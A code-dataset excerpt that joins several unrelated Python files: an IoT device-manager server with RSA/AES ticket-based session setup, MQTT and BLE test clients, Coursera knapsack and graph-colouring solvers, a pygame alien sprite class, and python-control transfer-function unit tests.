x = col.insert_one(info_esp1)
device_id = "8c408678593fff6c916f4177408633c1801fdc3bce650f83edbf43e6c06d79de"
doc = col.find({"uuid" : device_id}).limit(1)[0]
print(doc)
"""
# db = db_client[db_client_name]
#" col = db[collection_name]
# check if any gateway with the received id exists in the local database
# cursor = col.find({gateway_id: {"$exists": True}}).limit(1)
"""
[ {
'uuid': '8c408678593fff6c916f4177408633c1801fdc3bce650f83edbf43e6c06d79de',
'bt_addr': '30:AE:A4:EA:CA:A2',
'driver_list': [
{ 'id': 1,
'type': 'sensor',
'subtype': 'temperature',
'actions': ['readValue()', 'calibrateSensor()'],
'description': {'Measurement units': 'Celcius', 'Operational temperature': '[-10,50]', 'Model': 'model xzy', 'Manufacturer': 'abcdefg'}},
{ 'id': 2,
'type': 'actuator',
'subtype': 'lightbulb',
'actions': ['turnOn()', 'turnOff()', 'increaseBrightness()', 'decreaseBrightness()'],
'description': {'Measurement units': 'Celcius', 'Operational range': '[-10,50]', 'Model': 'model yrz', 'Manufacturer': 'gfdsad'}
}
]
}
]
"""
```
#### File: src/DHM/DHM_server.py
```python
import pymongo
import os
import base64
import datetime
from tornado.ioloop import IOLoop
from tornado.web import Application, RequestHandler
import threading
import getpass
import json
import logging
import ast
import time
from urllib import request, parse
import requests
import operator
from queue import Queue
from dhm_security_module import *
# logger setup
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s",
handlers=[
logging.FileHandler("{0}/{1}.log".format(os.getcwd()+"/logs/", "logger")),
logging.StreamHandler()
])
logger = logging.getLogger()
HOST = "localhost"
PORT = 7777
db_client_name = "IOT_DHM_DB"
col_a3c_gw = "a3c_gw_info"
col_gw = "gw_info"
col_dh = "dh_info"
db_client = None
GW_ADDR = "http://192.168.1.79" # Hardcoded gateway address (assuming discovery already occurred inside the local area network)
GW_PORT = "1111" # hardcoded gateway port
# dictionary containing the connection session properties with the clients
# A session includes
# > session key
# > ...
connections = {}
# list of devices managed by this dhm server
dh_list = []
# list of gateways to communicate
gw_list = []
# global variables
server_id = None
server_pub_key_pem = None
server_pub_key = None
server_priv_key = None
# thread responsible for revoking the client session
# every X seconds the thread will check for clients
class ConnectionManager(threading.Thread):
def run(self):
# < TODO >
print("oi")
# Class to be used if the registration process is initiated
# by the AAA server itself. The server polls for online
# gateways and sends its information and location to
# the gateway. The registration is performed by also
# sending its public key along with its signature.
# < TODO >
'''
class RegistrationManager(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
return
'''
class MainHandler(RequestHandler):
def get(self):
self.write("IoT DHM Server")
# Class to be used if the registration process is initiated by
# the gateways themselves. They actively wait and search for the
# AAA server to be operational. When it is they then annouce their
# idenity to the server which must be verified and valid
class RegistrationHandler(RequestHandler):
def post(self):
return
class AuthenticationHandler(RequestHandler):
def post(self):
return
class DHConfirmHandler(RequestHandler):
def post(self):
dh_uuid = self.get_body_argument('dh_uuid')
status = self.get_body_argument('status')
print(status)
if(status == "OK"):
logger.info("DH " + dh_uuid +" successfully configured")
def get(self):
print("GET")
def make_app():
urls = [
("/", MainHandler),
("/authenticationRequest/", AuthenticationHandler),
("/registrationRequest/", RegistrationHandler),
("/dhSessionConfirm/", DHConfirmHandler)
]
return Application(urls, debug=True)
def authTicketGen(device, derived_key, gw_id):
key = os.urandom(16) # 128 bit key for GW <-> DH session
#secret = encryptRSA(loadKey(device['pub_key'].encode()), key)
secret = encryptRSAPKCS1v15(loadKey(device['pub_key'].encode()), key)
#print("Session key (K) for GW <-> DH session establishment")
#for b in key:
# print(int(b))
public = {'dh_id' : device['uuid'], 'dh_addr' : device['ble_addr'], 'owner_id' : gw_id, 'access_rights' : 'Rx', 'ticket_lifetime': 3600}
m = secret + str(public).encode()
signature = signRsaPKCS1v15(server_priv_key, m)
ticket = {
'secret': secret, #base64.b64encode(secret),
'public' : base64.b64encode(str(public).encode()),
'signature': signature #base64.b64encode(signature),
}
return ticket, key
# thread responsible for managing the connections and sessions between the DHM and each GW
class DHM_GW_Session(threading.Thread):
def __init__(self, queue, gw_addr, gw_id, a3c_pub_key, session_key, ticket, sleep_delta):
threading.Thread.__init__(self)
self.queue = queue
self.gw_addr = gw_addr # url address of the GW
self.gw_id = gw_id # uuid of the gw
self.gw_a3c_pub_key = a3c_pub_key
self.session_key = session_key # session key computed from the handshake with the A3C_GW
self.ticket = ticket # the ticket that authenticates the DHM as valid for session establishment
self.sleep_delta = sleep_delta # time interval between retrying to communicate with the GW in case it failed before
#self.delta = base64.b64decode(ticket['public'])['expiration_date'] # duration of the session in seconds
self.r1 = os.urandom(16) # nonce to send to gw
self.derived_key = None
def run(self):
while True:
#print("# Starting DHM <-> GW session...")
logger.info("Starting DHM <-> GW session. GW UUID " + self.gw_id)
req_body = {
'ticket' : self.ticket,
'public_key' : base64.b64encode(serializeKey(self.gw_a3c_pub_key)),
'nonce' : base64.b64encode(self.r1)
}
data = parse.urlencode(req_body).encode()
#req = request.Request(self.gw_addr+"/dhmSessionSetup/", data)
req = request.Request(GW_ADDR+":"+GW_PORT+"/dhmSessionSetup/", data)
response = ast.literal_eval(request.urlopen(req).read().decode())
#print(response)
r2 = base64.b64decode(response['nonce'])
# compute derived key K'
self.derived_key = digestMD5(self.session_key, [self.r1, r2])
#print("Derived session key (K') with GW")
#for b in self.derived_key:
# print(int(b))
# validate the sent nonce r1 by decrypting it
recv_r1 = decryptAES(response['enc_nonce'][0],self.derived_key,response['enc_nonce'][1])
# encrypt the received nonce r2
# these last two steps are required to ensure that targets do not create a session
# for an attacker using a stolen ticket
data_final = { 'nonce' : base64.b64encode(str(encryptAES(self.derived_key, r2)).encode()) }
req = request.Request(GW_ADDR+":"+GW_PORT+"/dhmSessionSetup/validation/", parse.urlencode(data_final).encode()) #######################
request.urlopen(req)
#response =... # is there a response to this message ?
#print("## Session established successfully with the target GW")
logger.info("Successfully established session with GW UUID: " + self.gw_id)
# now that the session is established the DHM sends authentication tokens for
# the GW to be able to locate the devices and authenticate itself towards them
# fetch DHs managed by this gateway
# and generate the respective access token
logger.info("Fetching DHs data to configure target GW UUID " + self.gw_id)
managed_dhs = []
auth_data = {} # authentication data containing the dh ticket and its respective session key with the gw encrypted with gw public key
for device in dh_list:
if(device['master_gw_uuid'] == self.gw_id):
managed_dhs.append(device)
ticket, key = authTicketGen(device, self.derived_key, self.gw_id)
gw_pub_key = [g for g in gw_list if g['uuid'] == self.gw_id][0]['pub_key']
#auth_data[device['uuid']] = [ ticket, encryptRSA(loadKey(gw_pub_key.encode()), key)]
enc_key, iv = encryptAES(key, self.derived_key)
#print("AES Encrypted Key")
#for b in enc_key:
# print(int(b))
#print("IV")
#for b in iv:
# print(int(b))
#print("KEY used in AES cipher")
#for b in self.derived_key:
# print(int(b))
auth_data[device['uuid']] = [ ticket, enc_key, iv ]
d = base64.b64encode(str(auth_data).encode())
# hmac is generated over the base 64 encode in order to avoid dictionary rearrangements/disparities
# at the gw endpoint, resulting in different hmacs
hmac = generateHMAC(self.derived_key, d)
request_data = {
'data' : d,
'signature' : base64.b64encode(hmac)
}
logger.info("Sending configuration tickets to target GW UUID " + self.gw_id)
req = request.Request(GW_ADDR+":"+GW_PORT+"/dhTickets/", parse.urlencode(request_data).encode()) ########################################################
response = request.urlopen(req).read().decode()
logger.info(response)
# thread blocks until receiving any new data
#job = self.queue.get()
#if job == "Session_renew":
# # do work
# elif job is None:
# break
return
#time.sleep(self.sleep_delta)
# thread responsible for managing the connections and sessions between the DHM and each A3C GW server
class DHM_A3C_Session(threading.Thread):
def __init__(self, a3c_uuid, addr, a3c_pub_key, target_gw_id, target_gw_addr, delta, sleep_delta):
threading.Thread.__init__(self)
self.a3c_uuid = a3c_uuid # uuid of the a3c server
self.a3c_addr = addr # url address for the a3c
self.a3c_pub_key = loadKey(a3c_pub_key) # public key of the a3c
self.target_gw_id = target_gw_id
self.target_gw_addr = target_gw_addr
self.delta = delta # duration of the session in seconds.
self.sleep_delta = sleep_delta # time interval between retrying to communicate with the A3C in case it failed before
self.r1 = os.urandom(16) # nonce to send to A3C
#self.session_key = None
def run(self):
while True:
try:
#print("# Fecthing ticket from A3C_GW...")
logger.info("Fetching ticket from A3C GW with uuid " + self.a3c_uuid)
req_body = {
'id' : self.target_gw_id, # id of the target gateway to be accessed
'public_key' : base64.b64encode(server_pub_key_pem),
'nonce' : base64.b64encode(encryptRSA(self.a3c_pub_key, self.r1))
}
data = parse.urlencode(req_body).encode()
req = request.Request(self.a3c_addr+"/ticketFetch/", data)
#response = request.urlopen(req).read().decode()
response = ast.literal_eval(request.urlopen(req).read().decode())
#print(response)
# recover nonce2
nonce2 = decryptRSA(server_priv_key,base64.b64decode(response['nonce']))
ticket = response['ticket']
a3c_public_key = base64.b64decode(response['public_key'])
# compute session key using the retrieved nonce
session_key = bytes(map(operator.xor, self.r1, nonce2))
#print("## Ticket fetched successfully!")
logger.info("Successfully fetched ticket from " + self.a3c_uuid)
# start DHM-GW connection and session establishment
dhm_gw_session_queue = Queue()
dhm_gw_session = DHM_GW_Session(dhm_gw_session_queue,self.target_gw_addr, self.target_gw_id, self.a3c_pub_key, session_key, ticket, self.sleep_delta)
dhm_gw_session.start()
return
#Once the session expires the thread must restart
# < TODO >
except requests.exceptions.ConnectionError:
print("# Failed to connect to server \n## Trying again in {} seconds".format(self.sleep_delta))
#except Exception as exc:
# print(exc)
# print("# An error ocurred while registering in the server\n## Trying again in {} seconds".format(self.sleep_delta))
time.sleep(self.sleep_delta)
return
def main():
# server password input
# it will be used to load the server private key
#server_password = bytes(getpass.getpass(),'utf-8')
server_password = b"<PASSWORD>!\"#$%&/()="
#print("# IOT DHM server starting...")
logger.info("DHM server starting")
# init database
logger.info("Loading database")
global db_client
db_client = pymongo.MongoClient("mongodb://localhost:27017/")
db = db_client[db_client_name]
crypt_col = db["crypto_info"]
logger.info("Fetching hashed password from database")
for d in crypt_col.find({}):
db_hash = d['key']
db_salt = d['salt']
if not db_hash:
logger.critical("Password not found in local database")
return
if not db_salt:
logger.critical("Password salt value not found in local database ")
return
# check if password matches the salted hash stored in database
key = PBKDF2(server_password, db_salt)
if(not verifyPKBDF2(key, server_password, db_salt)):
#print("ERROR: Invalid password!")
logger.critical("Provided bootstrap password does not match stored password")
return
else:
#print("## Correct password")
logger.info("Correct bootstrap password")
# load server key_pair from file
global server_pub_key_pem
server_pub_key_pem = loadKeyPEM("rsa_dhm","public",password=<PASSWORD>,path="")
if(server_pub_key_pem == -1):
logger.critical("Failed to load public key")
return
logger.info("Public key loaded successfully")
global server_priv_key
server_priv_key = loadKeyPEM("rsa_dhm","private",server_password,path="")
if(server_priv_key == -1):
logger.critical("Failed to load private key")
return
logger.info("Private key loaded successfully")
global server_pub_key
server_pub_key = loadKey(server_pub_key_pem)
#print("## Keys loaded successfully!")
# DHM id is equal to the digest of its public key
global server_id
server_id = digestMD5(server_pub_key_pem).hex()
#print("Server ID: " + server_id)
logger.info("Server ID : " + server_id)
## LOGIN procedure complete ##
# fetch info of DH this DHM manages from db
dh_col = db[col_dh]
global dh_list
for d in dh_col.find({}):
dh_list.append({
'uuid' : d['uuid'],
'pub_key' : d['pub_key'],
'ble_addr' : d['ble_addr'],
'master_gw_uuid' : d['master_gw_uuid']
})
#print(dh_list)
logger.info("Successfully loaded DHs info from local database")
# fetch GW info from db
gw_col = db[col_gw]
global gw_list
for d in gw_col.find({}):
gw_list.append({
'uuid' : d['uuid'],
'pub_key' : d['pub_key'],
'addr' : d['addr'],
'master_a3c_uuid' : d['master_a3c_uuid']
})
#print(gw_list)
logger.info("Successfully loaded GWs info from local database")
# fetch A3C GW info from database (address, uuid, public key)
a3c_gw_col = db[col_a3c_gw]
a3c_gw_list = []
for d in a3c_gw_col.find({}):
a3c_gw_list.append({
'uuid' : d['uuid'],
'pub_key' : d['pub_key'],
'addr' : d['addr']
})
#print(a3c_gw_list)
for device in dh_list:
target_gw_id = device['master_gw_uuid']
# get info of device gw
gw = [g for g in gw_list if g['uuid'] == target_gw_id ]
gw_a3c_server_uuid = gw[0]['master_a3c_uuid']
target_gw_addr = gw[0]['addr']
#print(target_gw_addr)
# get info of the master a3c of the target gw
a3c_gw = [a for a in a3c_gw_list if a['uuid'] == gw_a3c_server_uuid][0]
a3c_gw_address = a3c_gw['addr']
a3c_gw_pub_key = a3c_gw['pub_key']
## Start DHM-A3C session. # 1 session <=> 1 thread
logger.info("Starting session with GW A3C server: " + gw_a3c_server_uuid)
t = DHM_A3C_Session(gw_a3c_server_uuid, a3c_gw_address, a3c_gw_pub_key.encode(), target_gw_id, target_gw_addr, 3600, 60)
t.start()
## Init REST/web server ##
# init tornado web server
app = make_app()
app.listen(PORT)
#print("Server online and listening")
logger.info("Starting web server")
IOLoop.current().start()
if __name__ == "__main__":
main()
```
#### File: src/GW/MQTT_client.py
```python
import paho.mqtt.client as mqtt
def on_connect(mqttc, obj, flags, rc):
print("rc: " + str(rc))
def on_message(mqttc, obj, msg):
print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
def on_publish(mqttc, obj, mid):
print("mid: " + str(mid))
def on_subscribe(mqttc, obj, mid, granted_qos):
print("Subscribed: " + str(mid) + " " + str(granted_qos))
def on_log(mqttc, obj, level, string):
print(string)
def main():
mqttc = mqtt.Client(client_id="", clean_session=True, userdata=None,transport="websockets")
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
mqttc.on_log = on_log
mqttc.connect_async("localhost")
mqttc.subscribe('house/temperature')
mqttc.loop_forever()
if __name__ == "__main__":
main()
```
#### File: GW/tests/ble_notify_test.py
```python
import bluepy.btle
import json
import time
from bluepy.btle import Scanner, DefaultDelegate, Peripheral
from struct import *
DH_ADDRESS = "30:AE:A4:EA:C2:C2"
class PeripheralDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
def handleNotification(self,cHandle,data):
print("Notification received!")
print(data)
class ScanDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
def handleDiscovery(self,dev,isNewDev,isNewData):
if(isNewDev):
print("Discovered device: {}".format(dev.addr))
elif(isNewData):
print("Received new data from {}".format(dev.addr))
def main():
scanner = Scanner().withDelegate(ScanDelegate())
device_list = scanner.scan(5) # scan for 5 seconds
for device in device_list:
if(device.addr.lower() == DH_ADDRESS.lower()):
print("Target device host discovered!")
# RSSI = Received Signal Strength Indicator
#print("Device %s (%s), RSSI=%d dB" % (device.addr, device.addrType, device.rssi ))
scan_data = device.getScanData()
device_name = scan_data[2][2]
auth_service_uuid = scan_data[4][2]
#print(device_name)
#print(auth_service_uuid)
#for (adtype,desc,value) in device.getScanData():
# print("\t%s = %s" % (desc, value))
device = Peripheral(DH_ADDRESS)
device.setMTU(520)
device.setDelegate(PeripheralDelegate())
print("Successfully connected to device host")
auth_service = device.getServiceByUUID(auth_service_uuid)
auth_char = auth_service.getCharacteristics()[0]
# read authentication characteristic state
#print(auth_char.valHandle)
auth_char_cccd = auth_char.getHandle() + 1
print("CCCD 0x%X" % auth_char_cccd)
device.writeCharacteristic(auth_char_cccd, b"\x01\x00")
#device.withDelegate(PeripheralDelegate())
auth_char_val = auth_char.read()
print(auth_char_val)
#if(auth_char_val == 0):
## print("Zero")
# wait for server confirmation as a notification message
while True:
if(device.waitForNotifications(1.0)):
print("new notification from server")
continue
print("Waiting...")
if __name__ == "__main__":
main()
``` |
{
"source": "joaoandre/coursera",
"score": 3
} |
#### File: week2/knapsack/solver-old.py
```python
from collections import namedtuple
import queue
Item = namedtuple("Item", ['index', 'value', 'weight', 'density'])
# Node = namedtuple("Node", ["level", "profit", "bound", "weight"])
class Node(object):
def __init__(self, level=-1, profit=0, weight=0, bound=0):
self.level = level
self.profit = profit
self.weight = weight
self.bound = bound
def solve_it(input_data):
# Modify this code to run your optimization algorithm
# parse the input
lines = input_data.split('\n')
firstLine = lines[0].split()
item_count = int(firstLine[0])
capacity = int(firstLine[1])
items = []
weights = []
values = []
for i in range(1, item_count + 1):
line = lines[i]
parts = line.split()
v = int(parts[0])
w = int(parts[1])
d = v / w
weights.append(w)
values.append(v)
items.append(Item(i - 1, v, w, d))
# Sort the items
items = sorted(items, key=lambda x: x.density, reverse=True)
n = len(items)
value = bb_solution(items, capacity, n)
# print(value)
# prepare the solution in the specified output format
output_data = str(value) + ' ' + str(1) + '\n'
output_data += ' '.join(map(str, []))
return output_data
def greedy_solution(n, k, items):
value = 0
weight = 0
taken = [0] * n
for item in items:
if weight + item.weight <= k:
taken[item.index] = 1
value += item.value
weight += item.weight
return value, taken
def total_value(items, max_weight):
return sum([x.value for x in items]) if sum([x.weight for x in items]) <= max_weight else 0
# v = list of item values or profit
# w = list of item weight or cost
# W = max weight or max cost for the knapsack
def zeroOneKnapsack(v, w, W):
# c is the cost matrix
c = []
n = len(v)
c = zeros(n, W + 1)
for i in range(0, n):
# for ever possible weight
for j in range(0, W + 1):
# can we add this item to this?
if (w[i] > j):
c[i][j] = c[i - 1][j]
else:
c[i][j] = max(c[i - 1][j], v[i] + c[i - 1][j - w[i]])
return [c[n - 1][W], getUsedItems(w, c)]
# w = list of item weight or cost
# c = the cost matrix created by the dynamic programming solution
def getUsedItems(w, c):
# item count
i = len(c) - 1
currentW = len(c[0]) - 1
# set everything to not marked
marked = []
for i in range(i + 1):
marked.append(0)
while (i >= 0 and currentW >= 0):
if (i == 0 and c[i][currentW] > 0) or c[i][currentW] != c[i - 1][currentW]:
marked[i] = 1
currentW = currentW - w[i]
i = i - 1
return marked
def zeros(rows, cols):
row = []
data = []
for i in range(cols):
row.append(0)
for i in range(rows):
data.append(row[:])
return data
def bound(u, n, max_weight, items):
if u.weight >= max_weight:
return 0
profit_bound = u.profit
j = u.level + 1
total_weight = u.weight
while j < n and total_weight + items[j].weight <= max_weight:
total_weight += items[j].weight
profit_bound += items[j].value
j += 1
if j < n:
profit_bound += (max_weight - total_weight) * items[j].density
return profit_bound
def bb_solution(items, max_weight, n):
q = queue.Queue()
v = Node()
_u = Node()
q.put(_u)
max_profit = 0
while not q.empty():
u = q.get()
if u.level == -1:
v.level = 0
if u.level == n-1:
continue
v.level = u.level + 1
v.weight = u.weight + items[v.level].weight
v.profit = u.profit + items[v.level].value
if v.weight <= max_weight and v.profit > max_profit:
max_profit = v.profit
v.bound = bound(v, n, max_weight, items)
if v.bound > max_profit:
q.put(v)
return max_profit
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
file_location = sys.argv[1].strip()
with open(file_location, 'r') as input_data_file:
input_data = input_data_file.read()
print(solve_it(input_data))
else:
print(
'This test requires an input file. Please select one from the data directory. (i.e. python solver.py ./data/ks_4_0)')
```
#### File: week3/coloring/greedySolver1.py
```python
from random import choice
class Graph:
def __init__(self, vertices):
self.v = vertices
self.adj = {v: [] for v in range(0, vertices)}
def add_edge(self, v, w):
self.adj[v].append(w)
self.adj[w].append(v)
def get_degree(self, n):
return len(self.adj[n])
def get_group_by_degree(self, group):
return sorted(group, key=self.get_degree, reverse=True)
def greedy_coloring(self, order=None):
result = [-1] * self.v
start_index = order[0] if order else 0
available = [False] * self.v
if not order:
order = list(range(0, self.v))
result[start_index] = 0
for u in order[1:]:
for i in self.adj[u]:
if result[i] != -1:
available[result[i]] = True
for c in range(0, self.v):
if not available[c]:
# c += 1
break
result[u] = c
available = [False] * self.v
return result
def group_solution_by_color(self, solution):
color_map = {}
max_color = max(solution) + 1
for i, c in enumerate(solution):
if c not in color_map:
color_map[c] = [i]
continue
color_map[c].append(i)
return color_map, max_color
def solve_it(input_data):
# Modify this code to run your optimization algorithm
# parse the input
lines = input_data.split('\n')
first_line = lines[0].split()
node_count = int(first_line[0])
edge_count = int(first_line[1])
g = Graph(node_count)
edges = []
for i in range(1, edge_count + 1):
line = lines[i]
parts = line.split()
u, w = int(parts[0]), int(parts[1])
edges.append((u, w))
g.add_edge(u, w)
# build a trivial solution
# every node has its own color
order = []
for i in range(0, 3000):
solution = g.greedy_coloring(order)
order = []
color_map, highest_color = g.group_solution_by_color(solution)
colors = list(range(highest_color))
while len(colors) > 0:
c = colors.pop(choice(range(len(colors))))
order += g.get_group_by_degree(color_map[c])
# prepare the solution in the specified output format
output_data = str(max(solution) + 1) + ' ' + str(0) + '\n'
output_data += ' '.join(map(str, solution))
return output_data
import sys
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
file_location = sys.argv[1].strip()
with open(file_location, 'r') as input_data_file:
input_data = input_data_file.read()
print(solve_it(input_data))
else:
print('This test requires an input file. Please select one from the data directory. (i.e. python solver.py ./data/gc_4_1)')
``` |
{
"source": "joaoantonio17/Space-war",
"score": 4
} |
#### File: Space-war/Projeto/aliens.py
```python
import pygame, random
class Alien():
def __init__(self, janela, Label):
# Define as barras de vida do personagem
self.Label = Label
# Transforma a janela em um rect para usar as coordenadas
self.janela = janela
self.janela_rect = self.janela.get_rect()
# Define a imagem do alien, a posição randomica
self.alien = pygame.image.load("image/alien_1.png")
self.alien_rect = self.alien.get_rect()
X = random.randint(0, 16)
A = range(50, 900, 50)
B = range(-425, 0, 25)
self.alien_rect.x = A[X]
self.alien_rect.y = B[X]
def atualiza_alien(self):
# Regula para que os aliens voltem após passar de y=600, assim podendo ser mortos. E caso sejam mortos, devem ser criados outros
X = random.randint(0, 16)
A = range(50, 900, 50)
B = range(-1700, 0, 100)
if self.alien_rect.y < 600:
self.alien_rect.y += 3
else:
self.Label.C -= 1
self.alien_rect.x = A[X]
self.alien_rect.y = B[X]
def desenha_alien(self):
# Desenha os aliens na tela
self.janela.blit(self.alien, self.alien_rect)
def criar_aliens(Aliens, janela, Label):
# Controla o número de aliens
if len(Aliens) < 4:
novo_alien = Alien(janela, Label)
novo_alien.desenha_alien()
Aliens.append(novo_alien)
``` |
{
"source": "joaoantoniocardoso/python-control",
"score": 3
} |
#### File: control/tests/xferfcn_test.py
```python
import unittest
import numpy as np
from control.statesp import StateSpace, _convertToStateSpace, rss
from control.xferfcn import TransferFunction, _convert_to_transfer_function, ss2tf
from control.lti import evalfr
from control.exception import slycot_check
# from control.lti import isdtime
class TestXferFcn(unittest.TestCase):
"""These are tests for functionality and correct reporting of the transfer
function class. Throughout these tests, we will give different input
formats to the xTranferFunction constructor, to try to break it. These
tests have been verified in MATLAB."""
# Tests for raising exceptions.
def test_constructor_bad_input_type(self):
"""Give the constructor invalid input types."""
self.assertRaises(TypeError, TransferFunction, [[0., 1.], [2., 3.]], [[5., 2.], [3., 0.]])
def test_constructor_inconsistent_dimension(self):
"""Give the constructor a numerator and denominator of different
sizes."""
self.assertRaises(ValueError, TransferFunction, [[[1.]]], [[[1.], [2., 3.]]])
self.assertRaises(ValueError, TransferFunction, [[[1.]]], [[[1.]], [[2., 3.]]])
self.assertRaises(ValueError, TransferFunction, [[[1.]]],
[[[1.], [1., 2.]], [[5., 2.], [2., 3.]]])
def test_constructor_inconsistent_columns(self):
"""Give the constructor inputs that do not have the same number of
columns in each row."""
self.assertRaises(ValueError, TransferFunction, 1., [[[1.]], [[2.], [3.]]])
self.assertRaises(ValueError, TransferFunction, [[[1.]], [[2.], [3.]]], 1.)
def test_constructor_zero_denominator(self):
"""Give the constructor a transfer function with a zero denominator."""
self.assertRaises(ValueError, TransferFunction, 1., 0.)
self.assertRaises(ValueError, TransferFunction,
[[[1.], [2., 3.]], [[-1., 4.], [3., 2.]]],
[[[1., 0.], [0.]], [[0., 0.], [2.]]])
def test_add_inconsistent_dimension(self):
"""Add two transfer function matrices of different sizes."""
sys1 = TransferFunction([[[1., 2.]]], [[[4., 5.]]])
sys2 = TransferFunction([[[4., 3.]], [[1., 2.]]], [[[1., 6.]], [[2., 4.]]])
self.assertRaises(ValueError, sys1.__add__, sys2)
self.assertRaises(ValueError, sys1.__sub__, sys2)
self.assertRaises(ValueError, sys1.__radd__, sys2)
self.assertRaises(ValueError, sys1.__rsub__, sys2)
def test_mul_inconsistent_dimension(self):
"""Multiply two transfer function matrices of incompatible sizes."""
sys1 = TransferFunction([[[1., 2.], [4., 5.]], [[2., 5.], [4., 3.]]],
[[[6., 2.], [4., 1.]], [[6., 7.], [2., 4.]]])
sys2 = TransferFunction([[[1.]], [[2.]], [[3.]]], [[[4.]], [[5.]], [[6.]]])
self.assertRaises(ValueError, sys1.__mul__, sys2)
self.assertRaises(ValueError, sys2.__mul__, sys1)
self.assertRaises(ValueError, sys1.__rmul__, sys2)
self.assertRaises(ValueError, sys2.__rmul__, sys1)
# Tests for TransferFunction._truncatecoeff
def test_truncate_coefficients_non_null_numerator(self):
"""Remove extraneous zeros in polynomial representations."""
sys1 = TransferFunction([0., 0., 1., 2.], [[[0., 0., 0., 3., 2., 1.]]])
np.testing.assert_array_equal(sys1.num, [[[1., 2.]]])
np.testing.assert_array_equal(sys1.den, [[[3., 2., 1.]]])
def test_truncate_coefficients_null_numerator(self):
"""Remove extraneous zeros in polynomial representations."""
sys1 = TransferFunction([0., 0., 0.], 1.)
np.testing.assert_array_equal(sys1.num, [[[0.]]])
np.testing.assert_array_equal(sys1.den, [[[1.]]])
# Tests for TransferFunction.__neg__
def test_reverse_sign_scalar(self):
"""Negate a direct feedthrough system."""
sys1 = TransferFunction(2., np.array([-3.]))
sys2 = - sys1
np.testing.assert_array_equal(sys2.num, [[[-2.]]])
np.testing.assert_array_equal(sys2.den, [[[-3.]]])
def test_reverse_sign_siso(self):
"""Negate a SISO system."""
sys1 = TransferFunction([1., 3., 5], [1., 6., 2., -1.])
sys2 = - sys1
np.testing.assert_array_equal(sys2.num, [[[-1., -3., -5.]]])
np.testing.assert_array_equal(sys2.den, [[[1., 6., 2., -1.]]])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_reverse_sign_mimo(self):
"""Negate a MIMO system."""
num1 = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
num3 = [[[-1., -2.], [0., -3.], [-2., 1.]],
[[-1.], [-4., 0.], [-1., 4., -3.]]]
den1 = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
sys1 = TransferFunction(num1, den1)
sys2 = - sys1
sys3 = TransferFunction(num3, den1)
for i in range(sys3.outputs):
for j in range(sys3.inputs):
np.testing.assert_array_equal(sys2.num[i][j], sys3.num[i][j])
np.testing.assert_array_equal(sys2.den[i][j], sys3.den[i][j])
# Tests for TransferFunction.__add__
def test_add_scalar(self):
"""Add two direct feedthrough systems."""
sys1 = TransferFunction(1., [[[1.]]])
sys2 = TransferFunction(np.array([2.]), [1.])
sys3 = sys1 + sys2
np.testing.assert_array_equal(sys3.num, 3.)
np.testing.assert_array_equal(sys3.den, 1.)
def test_add_siso(self):
"""Add two SISO systems."""
sys1 = TransferFunction([1., 3., 5], [1., 6., 2., -1])
sys2 = TransferFunction([[np.array([-1., 3.])]], [[[1., 0., -1.]]])
sys3 = sys1 + sys2
# If sys3.num is [[[0., 20., 4., -8.]]], then this is wrong!
np.testing.assert_array_equal(sys3.num, [[[20., 4., -8]]])
np.testing.assert_array_equal(sys3.den, [[[1., 6., 1., -7., -2., 1.]]])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_add_mimo(self):
"""Add two MIMO systems."""
num1 = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den1 = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
num2 = [[[0., 0., -1], [2.], [-1., -1.]],
[[1., 2.], [-1., -2.], [4.]]]
den2 = [[[-1.], [1., 2., 3.], [-1., -1.]],
[[-4., -3., 2.], [0., 1.], [1., 0.]]]
num3 = [[[3., -3., -6], [5., 6., 9.], [-4., -2., 2]],
[[3., 2., -3., 2], [-2., -3., 7., 2.], [1., -4., 3., 4]]]
den3 = [[[3., -2., -4.], [1., 2., 3., 0., 0.], [-2., -1., 1.]],
[[-12., -9., 6., 0., 0.], [2., -1., -1.], [1., 0.]]]
sys1 = TransferFunction(num1, den1)
sys2 = TransferFunction(num2, den2)
sys3 = sys1 + sys2
for i in range(sys3.outputs):
for j in range(sys3.inputs):
np.testing.assert_array_equal(sys3.num[i][j], num3[i][j])
np.testing.assert_array_equal(sys3.den[i][j], den3[i][j])
# Tests for TransferFunction.__sub__
def test_subtract_scalar(self):
"""Subtract two direct feedthrough systems."""
sys1 = TransferFunction(1., [[[1.]]])
sys2 = TransferFunction(np.array([2.]), [1.])
sys3 = sys1 - sys2
np.testing.assert_array_equal(sys3.num, -1.)
np.testing.assert_array_equal(sys3.den, 1.)
def test_subtract_siso(self):
"""Subtract two SISO systems."""
sys1 = TransferFunction([1., 3., 5], [1., 6., 2., -1])
sys2 = TransferFunction([[np.array([-1., 3.])]], [[[1., 0., -1.]]])
sys3 = sys1 - sys2
sys4 = sys2 - sys1
np.testing.assert_array_equal(sys3.num, [[[2., 6., -12., -10., -2.]]])
np.testing.assert_array_equal(sys3.den, [[[1., 6., 1., -7., -2., 1.]]])
np.testing.assert_array_equal(sys4.num, [[[-2., -6., 12., 10., 2.]]])
np.testing.assert_array_equal(sys4.den, [[[1., 6., 1., -7., -2., 1.]]])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_subtract_mimo(self):
"""Subtract two MIMO systems."""
num1 = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den1 = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
num2 = [[[0., 0., -1], [2.], [-1., -1.]],
[[1., 2.], [-1., -2.], [4.]]]
